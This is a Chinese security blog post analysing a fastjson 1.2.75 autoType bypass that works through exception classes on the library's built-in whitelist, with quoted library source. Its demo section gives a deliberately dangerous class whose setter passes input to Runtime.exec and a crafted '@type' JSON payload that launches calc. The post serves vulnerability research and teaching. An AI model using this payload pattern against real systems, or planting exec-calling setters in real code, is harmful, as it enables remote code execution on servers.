fastjson1.2.75暂未修补的反序列化“漏洞“

已于 2024-11-11 16:49:51 修改
阅读量7.6k 收藏 12
点赞数 4
分类专栏: 笔记 文章标签: 安全 java
于 2020-12-30 19:12:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdihvai/article/details/111871147
版权
本文分析了fastjson1.2.75版本的一个潜在反序列化漏洞,该漏洞源于1.2.68版本的遗留问题。尽管1.2.69修复了部分问题,但作者指出1.2.75中仍存在漏洞,原因是未处理异常类的反序列化。文章详细探讨了"系统的白名单"、"通行证"和"绕过"策略,并提供了测试Demo,强调此漏洞虽利用难度较高,但仍具有研究价值。
摘要由CSDN通过智能技术生成

目录

前言

这几天在一直研究fastjson反序列化漏洞,从1.2.24版本开始一直到1.2.68版本,其漏洞分析及其利用在网上还是很多的,但不知是大佬们有意为之还是怎样,各博客上写的payload大致差不多,但其实在1.2.68的漏洞中,能用的思路不只有AutoCloseable这一个,还有其他方式也有可能导致RCE,我相信大佬们的手中依然有没有放出的payload。
目前最新1.2.75版本的漏洞(在我看来确实是漏洞,因为确实执行了反序列化攻击)的原因是我在分析1.2.68中找到的,我认为作者应该是知道的,因为原理和AutoCloseable是一样的,可能作者认为利用条件比较多,难以构成威胁,但作为学习之用还是很好的素材。

旧版本漏洞回顾

关于这个话题知乎上有答主做了高质量分析
fastjson到底做错了什么?为什么会被频繁爆出漏洞?
这个帖子很详细的总结了先前fastjson网上公开的漏洞细节,不过唯一不敢苟同的是作者在提到1.2.68版本中,主要利用方式是利用异常进行攻击,并且要重写getMessage方法。
其实在1.2.68版本中,利用最广泛的是使用AutoCloseable这个接口绕过checkAutoType,网上大多也以这种方式展开分析。因为AutoCloseable构成的payload所需要的条件可能没有那么复杂。文章中说1.2.69已经修复了异常攻击漏洞,但是经过测试似乎并没有。
AutoCloseable比较完整的利用链
fastjson 1.2.68 反序列化漏洞 gadgets 挖掘笔记

1.2.68的漏网之鱼

截止这篇文章发出,fastjson在github上的最新版本为1.2.75。
要分析1.2.75漏洞产生原因,我们还是要回到1.2.68版本的漏洞分析中去,本文不会去重提网上提到的一些常见的1.2.68的分析,会稍微提一下被人没有提出来的。

“系统的白名单”

fastjson1.2.68当初产生的主要原因在于,fastjson为了再次避免用户用其AutoType机制进行反序列化而产生漏洞,加入了checkAutoType方法,AutoType机制的标志就是“@type”这个标签。checkAutoType这个方法本意是不想让用户使用AutoType,除非用户自己开启AutoType。然而在checkAutoType方法实现过程中还是没忍住偷偷用了几下(标志是解析了"@type"标志),但加强了限制。在代码审计过程中,我发现了一行非常重要的代码。
这行代码位置在com.alibaba.fastjson.parser.ParserConfig第1326行

clazz = TypeUtils.getClassFromMapping(typeName);

(这行代码在fastjson宏观意义上有何作用暂不知晓)
clazz
其中typeName变量是用户输入的序列化之后的JSON格式数据中,含有类名的字符串,比如{"@type","com.demo.test"}这个json数据,其typeName就是com.demo.test。这行代码的意思就是从TypeUtils这个类中尝试获取json中提到的类。
TypeUtils的静态方法中,执行了addBaseClassMappings函数,其函数代码如下(注意其中含有AutoCloseable接口):

    private static void addBaseClassMappings(){
        mappings.put("byte", byte.class);
        mappings.put("short", short.class);
        mappings.put("int", int.class);
        mappings.put("long", long.class);
        mappings.put("float", float.class);
        mappings.put("double", double.class);
        mappings.put("boolean", boolean.class);
        mappings.put("char", char.class);
        mappings.put("[byte", byte[].class);
        mappings.put("[short", short[].class);
        mappings.put("[int", int[].class);
        mappings.put("[long", long[].class);
        mappings.put("[float", float[].class);
        mappings.put("[double", double[].class);
        mappings.put("[boolean", boolean[].class);
        mappings.put("[char", char[].class);
        mappings.put("[B", byte[].class);
        mappings.put("[S", short[].class);
        mappings.put("[I", int[].class);
        mappings.put("[J", long[].class);
        mappings.put("[F", float[].class);
        mappings.put("[D", double[].class);
        mappings.put("[C", char[].class);
        mappings.put("[Z", boolean[].class);
        Class<?>[] classes = new Class[]{
                Object.class,
                java.lang.Cloneable.class,
                loadClass("java.lang.AutoCloseable"),
                java.lang.Exception.class,
                java.lang.RuntimeException.class,
                java.lang.IllegalAccessError.class,
                java.lang.IllegalAccessException.class,
                java.lang.IllegalArgumentException.class,
                java.lang.IllegalMonitorStateException.class,
                java.lang.IllegalStateException.class,
                java.lang.IllegalThreadStateException.class,
                java.lang.IndexOutOfBoundsException.class,
                java.lang.InstantiationError.class,
                java.lang.InstantiationException.class,
                java.lang.InternalError.class,
                java.lang.InterruptedException.class,
                java.lang.LinkageError.class,
                java.lang.NegativeArraySizeException.class,
                java.lang.NoClassDefFoundError.class,
                java.lang.NoSuchFieldError.class,
                java.lang.NoSuchFieldException.class,
                java.lang.NoSuchMethodError.class,
                java.lang.NoSuchMethodException.class,
                java.lang.NullPointerException.class,
                java.lang.NumberFormatException.class,
                java.lang.OutOfMemoryError.class,
                java.lang.SecurityException.class,
                java.lang.StackOverflowError.class,
                java.lang.StringIndexOutOfBoundsException.class,
                java.lang.TypeNotPresentException.class,
                java.lang.VerifyError.class,
                java.lang.StackTraceElement.class,
                java.util.HashMap.class,
                java.util.Hashtable.class,
                java.util.TreeMap.class,
                java.util.IdentityHashMap.class,
                java.util.WeakHashMap.class,
                java.util.LinkedHashMap.class,
                java.util.HashSet.class,
                java.util.LinkedHashSet.class,
                java.util.TreeSet.class,
                java.util.ArrayList.class,
                java.util.concurrent.TimeUnit.class,
                java.util.concurrent.ConcurrentHashMap.class,
                java.util.concurrent.atomic.AtomicInteger.class,
                java.util.concurrent.atomic.AtomicLong.class,
                java.util.Collections.EMPTY_MAP.getClass(),
                java.lang.Boolean.class,
                java.lang.Character.class,
                java.lang.Byte.class,
                java.lang.Short.class,
                java.lang.Integer.class,
                java.lang.Long.class,
                java.lang.Float.class,
                java.lang.Double.class,
                java.lang.Number.class,
                java.lang.String.class,
                java.math.BigDecimal.class,
                java.math.BigInteger.class,
                java.util.BitSet.class,
                java.util.Calendar.class,
                java.util.Date.class,
                java.util.Locale.class,
                java.util.UUID.class,
                java.sql.Time.class,
                java.sql.Date.class,
                java.sql.Timestamp.class,
                java.text.SimpleDateFormat.class,
                com.alibaba.fastjson.JSONObject.class,
                com.alibaba.fastjson.JSONPObject.class,
                com.alibaba.fastjson.JSONArray.class,
        };
        for(Class clazz : classes){
            if(clazz == null){
                continue;
            }
            mappings.put(clazz.getName(), clazz);
        }
    }

可以发现是系统将这些类加入了mappings中,之前提到的
clazz = TypeUtils.getClassFromMapping(typeName);
也就一目了然了,就是尝试在TypeUtils类中尝试获取typeName值,如果没有获取到那么clazz为null,若expectClass此时也为null,就会触发异常,告诉用户AutoType不可用。正常情况下AutoType就是被禁止了。
然而还有另一种情况,若clazz不为空,则就存在绕过限制的可能,绕过的关键就是TypeUtils.mappings中所包含的类,它们就相当于是“系统的白名单”。

“通行证”

Debug过程就不描述了,只说结论。

  1. fastjson会首先从左至右寻找JSON格式中带“@type”的键,若存在,则将其键对应的值(即typeName)通过checkAutoType方法检查是否在"系统的白名单中"和用户自定义的白名单中,当然系统还有自带的黑名单,typeName还不能在黑名单中。
    以下为1.2.68系统设定的黑名单。
if (expectClass == null) {
            expectClassFlag = false;
        } else {
            if (expectClass == Object.class
                    || expectClass == Serializable.class
                    || expectClass == Cloneable.class
                    || expectClass == Closeable.class
                    || expectClass == EventListener.class
                    || expectClass == Iterable.class
                    || expectClass == Collection.class
                    ) {
                expectClassFlag = false;
            } else {
                expectClassFlag = true;
            }
        }
  1. 在确定typeName不在黑名单而又在白名单后,会将typeName赋值为expectClassexpectClass可是个好东西啊,相当于一个强大的通行证,他会允许expectClass的儿子们(实现类或子类)不需要通过系统白名单检查直接通过。1.2.68漏洞也因这个“通行证”而产生。

“绕过”

基于以上两个条件,当年的黑客们选择了AutoCloseable的实现类,AutoCloseable也是手持"通行证"的用户,至于如何利用之前分享的文章已经提到了,这里再次贴出:
fastjson 1.2.68 反序列化漏洞 gadgets 挖掘笔记
当然,如果是作为学习之用,可以用个简易的demo:
fastjson<=1.2.68的漏洞分析
除了AutoCloseable在这个系统的白名单外,还有其他的类也在其中,选择其他类也可以绕过checkAutoType,但仅仅是绕过,有些无法触发子类反序列化。
通过跟踪debug发现,当父类为异常类时,fastjson会调用ThrowableDeserializer进行处理,在处理中,该类会继续向后处理JSON格式字符串,若出现@type,会继续调用checkAutoType检查,但此时因为expectClass已被赋值为异常类,不为空,"通行证"拿到手,所以子类可以"跳过"系统白名单检查(也就是clazz为空也没关系),直接进行反序列化。
异常处理

关于这一点我和知乎那篇文章的作者观点一样,知乎的文章原文如下:

在fastjson中, 如果,@type 指定的类为 Throwable 的子类,那对应的反序列化处理类就会使用到ThrowableDeserializer, 而在ThrowableDeserializer#deserialze的方法中,当有一个字段的key也是 @type时,就会把这个 value当做类名,然后进行一次 checkAutoType 检测。并且指定了expectClass为Throwable.class,但是在checkAutoType中,有这样一约定,那就是如果指定了expectClass,那么也会通过校验。

如果父类或者接口是异常类以外的,可能就不一定能让子类或实现类反序列化了,比如当父类为SimpleDateFormat时,会向后检查有无"val"字符串,并不会检查@type,因此也就失去了反序列化的条件。

1.2.75的问题

上一节已经说了1.2.68的问题,回到现在的版本。
AutoCloseable产生的反序列化漏洞已经在1.2.69中修复了,修复的手段是将AutoCloseable加入黑名单,但是没有对异常类进行处理,所以仍然存在漏洞,该漏洞的利用条件如下:

  1. 危险类必须继承“系统白名单”中任意一个异常类
  2. 危险类中的危险方法必须为构造方法或者setter方法,参数可控是最好的。

关于为何setter方法也可以,fastjson到底做错了什么?为什么会被频繁爆出漏洞?知乎一文中已经说得很清楚了,此处不再重复。

测试Demo

测试环境:

  1. Web框架为springboot
  2. fastjson1.2.75

危险类:

package com.fastjson.demo.poc;

import java.io.IOException;

public class poc extends Exception {
    public void setS(String a){
        try {
            Runtime.getRuntime().exec(a);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

payload:

'{"@type":"java.lang.Exception","@type":"com.fastjson.demo.poc.poc","s":"calc"}'

测试Demo分享:
链接:https://pan.baidu.com/s/141HLCd-IVIe0jTYkhvgr-Q
提取码:ewra

演示弹出计算器GIF:
demo

小结

虽然这也是漏洞,但是和1.2.68版本已公开的漏洞利用一样,利用难度都要比1.2.24的大,但是仍然具有研究意义。
1.2.24版本的漏洞利用才算是真正的完美。

d3f4ult
关注
专栏目录
fastjson 1.2.74版本发布,fastjson反序列化漏洞升级
bufegar0的博客
10-14 6743
更新说明 fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。 但在安全方面fastjson总是被曝出存在反序列化安全漏洞,会造成会服务器的攻击,风险极大。 影响版本 fastjson <=1.2.68 fastjson sec版本 <= sec9 android版本不受此漏洞影响 解决办法 升级至最新版本1.2.74 1.2.74更新说明 Issues 修复序列化时B
FastJson远程命令执行漏洞学习笔记
m0_73257876的博客
09-04 736
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误,请大家批评指正!
fastjson1.2.75暂未修补反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补反序列化漏洞“-附件资源
fastjson漏洞--以运维角度进行修复
最新发布
菜鸟运维升级之路
09-11 725
漏洞是三个月前由安全团队扫描出来的,主要影响是: FastJSON是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。由于具有执行效率高的特点,应用范围广泛。FastJSON 存在反序列化远程代码执行漏洞漏洞成因是Fastjson autoType开关的限制可被绕过,然后反序列化安全风险的类。攻击者利用该漏洞可实现在目标机器上的远程代码执行。本文主要从运维侧修复手段介绍了该漏洞的两种修复方式。
fastjson-1.2.75.jar包
11-11
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
最新版fastjson-1.2.75.jar
11-09
fastjson是阿里的一个开源项目,在javaJavaBean对象、json字符串、json对象之间转换中很方便
fastjson-1.2.75-API文档-中文版.zip
06-05
赠送jar包:fastjson-1.2.75.jar; 赠送原API文档:fastjson-1.2.75-javadoc.jar; 赠送源代码:fastjson-1.2.75-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.75.pom; 包含翻译后的API文档:fastjson-1.2.75-javadoc-API文档-中文(简体)版.zip; Maven坐标:com.alibaba:fastjson:1.2.75; 标签:alibaba、fastjson、中文文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
fastjson 1.2.75_helloworld_
10-04
fast jston processing example
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
**Fastjson 1.2.69 反序列化远程代码执行漏洞详解** Fastjson 是阿里巴巴开源的一个高性能的 JSON 库,广泛应用于 Java 开发中,用于 JSON 的序列化和反序列化操作。然而,Fastjson 1.2.69 版本存在一个严重的反序...
fastjson-1.2.70.rar
06-19
4. **安全更新**:Fastjson持续关注安全问题,1.2.70可能修复了之前版本中发现的安全漏洞,增强了数据安全性。 5. **Bug修复**:此版本可能解决了前一版本存在的已知问题,提高了软件的稳定性。 三、使用Fastjson ...
jar包fastjson-1.2.75.zip
01-05
fastjson由alibaba开源的一套json处理器。与其他json处理器(如Gson,Jackson等)相比有比较明显的性能优势。
fastjson解析器和生成器 v1.2.75
11-25
为您提供fastjson解析器和生成器下载,Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象。Fastjson可以与任意Java对象一起使用,包括您没有源代码的现有对象。fastjson是一个性能很好的Java语言实现的JSON解析器和生成器,来自阿里巴巴的工程师开发。Fastjson特点:在服务器端和android客户端中提供最佳性能提供简单的toJSON
Fastjson漏洞详情
GyaoG的专栏
05-30 5670
一、fastjson漏洞详情 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean,是目前Java语言中最快的JSON库。由于Fastjson其优越的性能,被广泛使用在缓存序列化、协议交互等多种应用场景。然而在2022年5月23日,fastjson 官方发布安全通报,fastjson <= 1.2.80 存在反序列化任意代码执行漏洞,在特定条件下可绕过默认aut...
fastjson框架漏洞复现
没有
10-23 2383
fastjson是阿里巴巴开源的json解析库,通常被用于java object和json字符之间进行转换,提供两个方法json.tojsonstring和json.parseobject/json.parse来分别实现序列化与反序列化
FastJson反序列化漏洞(复现)
小赵同学的博客
07-29 4009
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
麻了!Fastjson 再曝反序列化漏洞。。
Java后端技术
06-04 241
往期热门文章:1、让人上瘾的新一代开发神器,彻底告别Controller、Service、Dao等方法 2、MySQL 暴跌! 3、超越 Xshell!号称下一代 Terminal 终端神器,用完爱不释手! 4、IDEA 官宣全新默认 UI,太震撼了!! 5、让你直呼「卧槽」的 GitHub 项目!近日 Fastjson Develop Team 发现 fastjson ...
fastjson1.2.48以下版本存在重大漏洞
码灵的博客
07-20 810
1. 场景描述 今天接公司通知:阿里的Fastjson,今天爆出了一个反序列化远程代码漏洞,比较严重的一个漏洞。 影响范围: 1.2.48以下的版本(不包括1.2.48)。 2. 解决方案 查看项目fastjson版本,版本号是否小于48,小于的话尽快升级。 2.1 查看项目版本号 版本号1.2.40,需升级 <dependency> <groupId>com.alibaba</groupId> .
fastjson1.2.80漏洞
09-13
fastjson 1.2.80 版本存在一个漏洞,该漏洞被称为 "fastjson 反序列化漏洞"。这个漏洞使得攻击者能够通过构造恶意的 JSON 字符串来执行任意代码,从而导致远程代码执行。 Fastjson 是一个 Java 库,用于处理 JSON 数据。在 fastjson 1.2.80 版本中,存在一个默认的反序列化特性,在处理某些特定类型的反序列化时存在安全漏洞。攻击者可以构造一个特定的 JSON 字符串,通过该字符串触发漏洞,从而执行任意的 Java 代码。 为了防止受到 fastjson 1.2.80 版本漏洞的影响,可以采取以下措施: 1. 升级 fastjson 到最新版本,最新版本已修复了该漏洞。建议使用最新的稳定版本,以确保安全。 2. 尽量避免使用 fastjson 对不受信任的数据进行反序列化操作。如果确实需要进行反序列化操作,请先对数据进行验证和过滤,确保数据的合法性和安全性。 3. 启用 Java安全沙箱机制,限制反序列化操作的权限。这样即使存在漏洞,攻击者也将受到一定的限制。 请注意,此漏洞仅影响 fastjson 1.2.80 版本。如果你使用的是其他版本,或者不使用 fastjson,那么该漏洞对你的应用程序不会产生影响。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值